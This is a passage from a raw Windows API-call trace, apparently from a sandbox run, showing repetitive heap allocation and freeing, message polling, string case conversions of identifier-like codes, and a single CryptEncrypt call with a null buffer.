wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0219.675] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0219.675] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0219.675] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0219.675] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9e0 [0219.675] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0219.675] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0219.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0219.675] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0219.675] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0219.675] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0219.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78200 | out: hHeap=0x2af0000) returned 1 [0219.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0219.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0219.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0219.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0219.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0219.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0219.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ecc0 [0219.676] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0219.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ecc0 | out: hHeap=0x2af0000) returned 1 [0219.676] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0219.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0219.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0219.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab998 [0219.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab758 [0219.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0219.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab818 [0219.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0219.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab818 | out: hHeap=0x2af0000) returned 1 [0219.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab758 | out: hHeap=0x2af0000) returned 1 [0219.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab998 | out: hHeap=0x2af0000) returned 1 [0219.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0219.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0219.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74238 | out: hHeap=0x2af0000) returned 1 [0219.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0219.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0219.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7140 [0219.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab878 [0219.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7a0 [0219.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0219.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab740 [0219.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0219.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0219.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0219.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab878 | out: hHeap=0x2af0000) returned 1 [0219.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7140 | out: hHeap=0x2af0000) returned 1 [0219.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0219.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0219.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e680 [0219.677] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0219.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e680 | out: hHeap=0x2af0000) returned 1 [0219.677] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0219.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0219.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0219.677] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0219.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781b0 | out: hHeap=0x2af0000) returned 1 [0219.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0219.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab878 [0219.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74358 [0219.677] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0219.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0219.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0219.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8a8 [0219.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab848 [0219.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0219.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7a0 [0219.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0219.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0219.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0219.677] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0219.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78070 | out: hHeap=0x2af0000) returned 1 [0219.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0219.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0219.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab848 | out: hHeap=0x2af0000) returned 1 [0219.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8a8 | out: hHeap=0x2af0000) returned 1 [0219.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0219.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0219.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ecc0 [0219.678] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0219.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ecc0 | out: hHeap=0x2af0000) returned 1 [0219.678] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0219.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0219.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7a0 [0219.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7d0 [0219.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0219.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab818 [0219.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0219.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab818 | out: hHeap=0x2af0000) returned 1 [0219.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7d0 | out: hHeap=0x2af0000) returned 1 [0219.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0219.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0219.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0219.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab740 [0219.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9e0 [0219.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0219.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8a8 [0219.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0219.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8a8 | out: hHeap=0x2af0000) returned 1 [0219.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0219.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0219.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0219.679] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0219.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74358 | out: hHeap=0x2af0000) returned 1 [0219.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab878 | out: hHeap=0x2af0000) returned 1 [0219.679] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0219.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0219.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0219.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0219.679] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0219.679] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0219.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7200 | out: hHeap=0x2af0000) returned 1 [0219.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0219.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0219.679] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0219.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ecc0 | out: hHeap=0x2af0000) returned 1 [0219.679] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0219.679] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0219.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78390 | out: hHeap=0x2af0000) returned 1 [0219.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0219.679] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0219.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0219.680] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0219.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78390 | out: hHeap=0x2af0000) returned 1 [0219.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0219.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0219.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0219.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0219.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0219.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0219.680] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0219.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0219.680] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0219.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0219.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0219.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab770 | out: hHeap=0x2af0000) returned 1 [0219.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0219.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0219.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0219.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0219.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7d0 | out: hHeap=0x2af0000) returned 1 [0219.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0219.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0219.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0219.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0219.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0219.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0219.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0219.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0219.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7d0 | out: hHeap=0x2af0000) returned 1 [0219.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab998 | out: hHeap=0x2af0000) returned 1 [0219.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0219.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0219.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0219.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78390 | out: hHeap=0x2af0000) returned 1 [0219.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0219.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0219.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0219.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabce0 | out: hHeap=0x2af0000) returned 1 [0219.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0219.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9b0 | out: hHeap=0x2af0000) returned 1 [0219.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0219.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0219.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0219.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba88 | out: hHeap=0x2af0000) returned 1 [0219.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb78 | out: hHeap=0x2af0000) returned 1 [0219.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc38 | out: hHeap=0x2af0000) returned 1 [0219.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0219.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0219.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0219.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabbf0 | out: hHeap=0x2af0000) returned 1 [0219.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0219.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0219.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabaa0 | out: hHeap=0x2af0000) returned 1 [0219.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba58 | out: hHeap=0x2af0000) returned 1 [0219.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0219.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0219.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0219.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0219.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabbf0 | out: hHeap=0x2af0000) returned 1 [0219.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabcb0 | out: hHeap=0x2af0000) returned 1 [0219.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabbd8 | out: hHeap=0x2af0000) returned 1 [0219.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0219.682] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0219.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabaa0 | out: hHeap=0x2af0000) returned 1 [0219.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0219.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba70 | out: hHeap=0x2af0000) returned 1 [0219.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0219.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabab8 | out: hHeap=0x2af0000) returned 1 [0219.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0219.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabba8 | out: hHeap=0x2af0000) returned 1 [0219.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0219.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc08 | out: hHeap=0x2af0000) returned 1 [0219.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0219.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabcb0 | out: hHeap=0x2af0000) returned 1 [0219.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0219.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc80 | out: hHeap=0x2af0000) returned 1 [0219.682] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0219.682] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aabcc8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0219.683] CryptEncrypt (in: hKey=0x9e1db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x8) returned 1 [0219.683] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0219.683] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0219.683] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0219.683] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0219.683] CharLowerBuffW (in: lpsz="byte[8]", cchLength=0x7 | out: lpsz="byte[8]") returned 0x7 [0219.683] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0219.683] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0219.683] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0219.683] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0219.683] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0219.683] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0219.683] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) 